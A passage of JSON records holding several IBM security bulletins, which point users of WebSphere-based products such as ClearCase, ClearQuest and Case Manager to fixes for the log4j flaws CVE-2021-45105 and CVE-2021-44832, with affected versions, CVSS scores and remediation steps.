"2022-06-28T22:03:36", "description": "## Summary\n\nWebSphere Application Server is shipped with WebSphere Remote Server. Information about security vulnerabilities affecting WebSphere Application Server have been published in a security bulletin.\n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM WebSphere Remote Server - Product Family| 9.0, 8.5 \n \n\n\n## Remediation/Fixes\n\nRefer to the following security bulletins for vulnerability details and information about fixes addressed by WebSphere Application Server which is shipped with WebSphere Remote Server. \n \n\n\n**Principal Product and Version(s)**\n\n| \n\n**Affected Supporting Product and Version**\n\n| \n\n**Affected Supporting Product Security Bulletin** \n \n---|---|--- \n \nWebSphere Remote Server \n9.0, 8.5\n\n| \n\nWebSphere Application Server 9.0, 8.5\n\n| \n\n[Multiple vulnerabilities in Apache log4j affect IBM WebSphere Application Server (CVE-2021-45105, CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6538148>) \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n05 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSUNCX\",\"label\":\"WebSphere Remote Server\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"},{\"code\":\"PF027\",\"label\":\"Solaris\"}],\"Version\":\"9.0, 8.5\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-06T20:11:30", "type": "ibm", "title": "Security Bulletin: Multiple Vulnerabilities have been identified in WebSphere Application Server shipped with WebSphere Remote Server", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44832", "CVE-2021-45105"], "modified": "2022-01-06T20:11:30", "id": "3092B1C0BAC8BA0F65979D37C5545C23B95C45DF35290A26827618ACF0E8B4E8", "href": "https://www.ibm.com/support/pages/node/6538724", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-06-28T22:07:07", "description": "## Summary\n\nIBM WebSphere Application Server (WAS) is shipped as a component of IBM Rational ClearCase. Information about security vulnerabilities affecting WAS have been published in security bulletins.\n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Rational ClearCase| 8.0.0 \nIBM Rational ClearCase| 9.0 \nIBM Rational ClearCase| 9.0.1 \nIBM Rational ClearCase| 9.1 \nIBM Rational ClearCase| 9.0.2 \nIBM Rational ClearCase| 8.0.1 \n \n\n\n## Remediation/Fixes\n\nRefer to the following security bulletin(s) for vulnerability details and information about fixes addressed by IBM WebSphere Application Server (WAS) which is shipped with IBM Rational ClearCase. \n\n**Principal Product and Version(s)**| **Affected Supporting Product and Version**| **Affected Supporting Product Security Bulletin** \n---|---|--- \nIBM Rational ClearCase, versions 8.0.0.x, 8.0.1.x, 9.0.0.x, 9.0.1.x, 9.0.2.x, 9.1.x| \n\nIBM WebSphere Application Server versions 8.5, and 9.0.\n\n| \n\n[Security Bulletin: Multiple vulnerabilities in Apache log4j affect IBM WebSphere Application Server (CVE-2021-45105, CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6538148> \"Security Bulletin: Multiple vulnerabilities in Apache log4j affect IBM WebSphere Application Server \\(CVE-2021-45105, CVE-2021-44832\\)\" ) \n \n**ClearCase Versions**\n\n| \n\n**Applying the fix** \n \n---|--- \n8.0.0.x, 8.0.1.x, 9.0.0.x, 9.0.1.x, 9.0.2.x, 9.1.x| \n\n 1. Determine the WAS version used by your CCRC WAN server. Navigate to the CCRC profile directory (either the profile you specified when installing ClearCase, or `<ccase-home>/common/ccrcprofile`), then execute the script: `bin/versionInfo.sh `(UNIX) or `bin\\versionInfo.bat `(Windows). The output includes a section \"IBM WebSphere Application Server\". Make note of the version listed in this section. Check your installed version of IBM WebSphere Application Server against this bulletin's list of vulnerable versions.\n 2. Identify the latest available fixes (per the bulletin(s) listed above) for the version of WAS used for CCRC WAN server.\n 3. Apply the appropriate WebSphere Application Server fix directly to your CCRC WAN server host. No ClearCase-specific steps are necessary. \n \n_For 8.0.x and earlier releases, IBM recommends upgrading to a fixed, supported version/release/platform of the product._\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n06 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSSH27\",\"label\":\"Rational ClearCase\"},\"Component\":\"CCRC WAN Server\",\"Platform\":[{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"All versions\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-07T04:30:54", "type": "ibm", "title": "Security Bulletin: Multiple security vulnerabilities have been identified in IBM WebSphere Application Server shipped with IBM Rational ClearCase (CVE-2021-45105, CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44832", "CVE-2021-45105"], "modified": "2022-01-07T04:30:54", "id": "CE291DB15FB1A7FDE49870DEF70725290D757902B5EB4009CD8DC9710150329D", "href": "https://www.ibm.com/support/pages/node/6538886", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-06-28T22:03:33", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM Case Manager. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Case Manager| 5.3CD \nIBM Case Manager| 5.2.1 \n \n\n\n## Remediation/Fixes\n\nPlease consult the security bulletin [Security Bulletin: Multiple vulnerabilities in Apache log4j affect IBM WebSphere Application Server (CVE-2021-45105, CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6538148> \"Security Bulletin: Multiple vulnerabilities in Apache log4j affect IBM WebSphere Application Server \\(CVE-2021-45105, CVE-2021-44832\\)\" ) for vulnerability details and information about fixes.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n06 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSCTJ4\",\"label\":\"Case Manager\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"5.2.1, 5.3.x\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-06T18:02:00", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Case Manager (CVE-2021-45105, CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44832", "CVE-2021-45105"], "modified": "2022-01-06T18:02:00", "id": "B1EA708CCF72B8264EA46A7D99E1616E7334C67D440D87A4F97B2B4087696EFD", "href": "https://www.ibm.com/support/pages/node/6538714", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-06-28T22:05:29", "description": "## Summary\n\nIBM WebSphere Application Server is a required product for IBM Tivoli Netcool Configuration Manager version 6.4.2. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nITNCM| 6.4.2 \n \n\n\n## Remediation/Fixes\n\nAffected Product(s)| Version(s)| Remediation \n---|---|--- \nITNCM| 6.4.2| \n\n[Multiple vulnerabilities in Apache log4j affect IBM WebSphere Application Server](<https://www.ibm.com/support/pages/node/6538148> \"Multiple vulnerabilities in Apache log4j affect IBM WebSphere Application Server\" )\n\n \nSee section: For V8.5.0.0 through 8.5.5.20:\n\n \nSee section: For V9.0.0.0 through 9.0.5.10: \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n06 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS7UH9\",\"label\":\"Tivoli Netcool Configuration Manager\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF051\",\"label\":\"Linux on IBM Z Systems\"}],\"Version\":\"6.4.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {}, "published": "2022-01-13T05:43:54", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server, which is a required product for IBM Tivoli Netcool Configuration Manager (CVE-2021-45105, CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-44832", "CVE-2021-45105"], "modified": "2022-01-13T05:43:54", "id": "A339910401C1CBEBCD02CB63650E2A2F954071F79CBC8E8EA704AFBB756CF438", "href": "https://www.ibm.com/support/pages/node/6540532", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-28T22:07:26", "description": "## Summary\n\nIBM WebSphere Application Server (WAS) is used by the IBM Rational ClearQuest server and web components. Information about security vulnerabilities affecting WAS have been published in a security bulletin. \n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nIBM Rational ClearQuest | 8.0.0 \nIBM Rational ClearQuest | 8.0.1 \nIBM Rational ClearQuest | 9.0 \nIBM Rational ClearQuest | 9.0.1 \nIBM Rational ClearQuest | 9.0.2 \nIBM Rational ClearQuest | 9.1 \n \n## Remediation/Fixes\n\nRefer to the following security bulletin(s) for vulnerability details and information about fixes addressed by IBM WebSphere Application Server (WAS), which is used by IBM Rational ClearQuest. \n\n**Principal Product and Version(s)** | **Affected Supporting Product and Version** | **Affected Supporting Product Security Bulletin** \n---|---|--- \nIBM Rational ClearQuest, versions 8.0.0.x, 8.0.1.x, 9.0.0.x, 9.0.1.x, 9.0.2.x, 9.1.0.x | IBM WebSphere Application Server versions 8.5 and 9.0. | \n\n[Security Bulletin: Multiple vulnerabilities in Apache log4j affect IBM WebSphere Application Server (CVE-2021-45105, CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6538148> \"Security Bulletin: Multiple vulnerabilities in Apache log4j affect IBM WebSphere Application Server \\(CVE-2021-45105, CVE-2021-44832\\)\" ) \n \n**ClearQuest Versions**\n\n| \n\n**Applying the fix** \n \n---|--- \n8.0.0.x, 8.0.1.x, 9.0.0.x, 9.0.1.x, 9.0.2.x, 9.1.0.x | Apply the appropriate IBM WebSphere Application Server fix (see bulletin link above) directly to your CM server host. No ClearQuest-specific steps are necessary. \n \n_For 8.0.x, 8.0.1.x and earlier releases, IBM recommends upgrading to a fixed, supported version/release/platform of the product._\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n07 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Type\":\"MASTER\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSSH5A\",\"label\":\"Rational ClearQuest\"},\"ARM Category\":[{\"code\":\"a8m50000000L0iAAAS\",\"label\":\"ClearQuest\"}],\"ARM Case Number\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"All Versions\"}]", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-07T20:03:53", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities have been identified in IBM WebSphere Application Server used by IBM Rational ClearQuest (CVE-2021-45105, CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44832", "CVE-2021-45105"], "modified": "2022-01-07T20:03:53", "id": "8B18A583802DE934D0ABAD4E3B44AE36DEAE634549737EEE9B825D44B47BD7DA", "href": "https://www.ibm.com/support/pages/node/6538888", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-06-28T22:00:37", "description": "## Summary\n\nIBM WebSphere Application Server is shipped with IBM Security Access Manager for Enterprise Single Sign-On. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\n8.2.1, 8.2.2\n\n \n\n\n## Remediation/Fixes\n\n**Principal Product and Version(s)**| **Affected Supporting Product and Version**| **Affected Supporting Product Security Bulletin** \n---|---|--- \nIBM Security Access Manager for Enterprise Single Sign-On 8.2.1| IBM WebSphere Application Server 8.5| [Security Bulletin: Multiple vulnerabilities in Apache log4j affect IBM WebSphere Application Server (CVE-2021-45105, CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6538148> \"Security Bulletin: Multiple vulnerabilities in Apache log4j affect IBM WebSphere Application Server \\(CVE-2021-45105, CVE-2021-44832\\)\" ) \nIBM Security Access Manager for Enterprise Single Sign-On 8.2.2| IBM WebSphere Application Server 8.5| [Security Bulletin: Multiple vulnerabilities in Apache log4j affect IBM WebSphere Application Server (CVE-2021-45105, CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6538148> \"Security Bulletin: Multiple vulnerabilities in Apache log4j affect IBM WebSphere Application Server \\(CVE-2021-45105, CVE-2021-44832\\)\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n12 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 